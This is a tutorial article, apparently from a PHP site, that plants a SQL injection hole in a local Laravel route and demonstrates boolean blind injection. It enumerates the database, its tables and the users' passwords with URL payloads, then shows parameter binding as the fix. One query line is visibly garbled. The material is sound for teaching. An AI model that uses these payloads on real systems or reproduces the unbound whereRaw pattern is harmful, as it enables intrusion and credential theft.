Parsing SQL blind injection principles through laravel vulnerability examples

This article brings you relevant knowledge about laravel, which mainly introduces how to explain the principle of SQL blind injection by creating a laravel vulnerability. The so-called blind injection means that there is no error response from the server. Let’s take a look at the injection attack completed when displaying. I hope it will be helpful to everyone.

[Related recommendations: laravel video tutorial】

Environment

composer create-project laravel/laravel lar9 // 安装laravel9
// 编辑.env  修改为DEBUG=false 配置数据库
DEBUG=false
DB_HOST=....
php artisan migrate
php artisan serve // 启动
// 插入数据
insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');

Create vulnerability

// routes/web.php
Route::get('/', function () {
 $id = request()->id;
 $user = \App\Models\User::whereRaw('id = '.$id)->first();
 return $user->name ?? '';
});
// 最后转换的sql是: select * from users where id = $id

Test

http://127.0.0.1:8000/?id=1'
// 500
http://127.0.0.1:8000/?id=1 and 1=2
// select * from users where id = 1 and 1=2; 返回空
http://127.0.0.1:8000/?id=1 and 1=1
// select * from users where id = 1 and 1=1 返回xxh

Steps

Database name

Guess Find the length of the data name

url: http://127.0.0.1:8000/?id=1 and length(database()) = 1
select * from users where id = 1 and length(database()) = 1
select * from users where id = 1 and length(database()) = 2
// 一直循环下去

Guess the database name

从第一步 知道了数据库名长度
`select * from users where id = 1 and substr(database(),1,1) =a`
`select * from users where id = 1 and substr(database(),1,1) =b`
// 一直循环下去 找到数据库名的第一个做字符  然后找第二个字符  直到找完数据库名的长度

Finally: laravel_project

Table name

The following steps and guessing The database is almost the same, so I’ll just talk about it briefly.

information_schema

information_schema comes with mysql.

The database name, table name, column type, etc. are all recorded. Guess the table fields need to be obtained from this database. Come.

Guess the number of tables in laravel_project

url:   http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5
mysql> select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct";
+----------+
| count(*) |
+----------+
|        5 |
+----------+

Guess the length of the first table name

With [guess the data name Length] This is not much.

Guess the first table name

url:   http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f'
mysql> select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1;
+------------------------+
| substr(table_name,1,1) |
+------------------------+
| f                      |
+------------------------+
// 得出第一个表的第一个字段是f  然后查第

Finally the first table name is: failed_jobs

Guess the field

The same logic as guessing the table.

select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; //  fail_jobs字段总数

Guess the data

Data This is the most important thing.

Because failed_jobs has no data, I changed it to users.

users has a password field.

mysql> select substr((select password from users limit 0,1),1,1);
+----------------------------------------------------+
| substr((select password from users limit 0,1),1,1) |
+----------------------------------------------------+
| w                                                  |
+----------------------------------------------------+
得出第一个是w,存起来,最后判断
mysql> select substr((select password from users limit 0,1),1,2);
+----------------------------------------------------+
| substr((select password from users limit 0,1),1,2) |
+----------------------------------------------------+
| wo                                                 |
+----------------------------------------------------+
第二个值为o
用第一个值 + 第二个值作为盲注

......

Defense

(Sometimes where does not meet the needs, you need whereRaw)

If necessary, remember Just bind it.

Route::get('/', function () {
 $id = request()->id;
 $user = \App\Models\User::whereRaw('id = ?',[$id])->first();
 return $user->name ?? '';
});

As long as you use the framework safely, there will be no loopholes.

Those old projects are full of loopholes.

In this era, it is difficult to find loopholes.

Ps

For the sake of simplicity, the simplest search is used above.

Manual blind injection should use binary search.

select * from users where id = 1 and  substr(database(),1,1) ='a';
换成二分:
 select * from users where id = 1 and  ascii(substr(database(),1,1)) > 99;

It is best to use the tool sqlmap to scan it out directly.

[Related recommendations: laravel video tutorial]

The above is the detailed content of Parsing SQL blind injection principles through laravel vulnerability examples. For more information, please follow other related articles on the PHP Chinese website!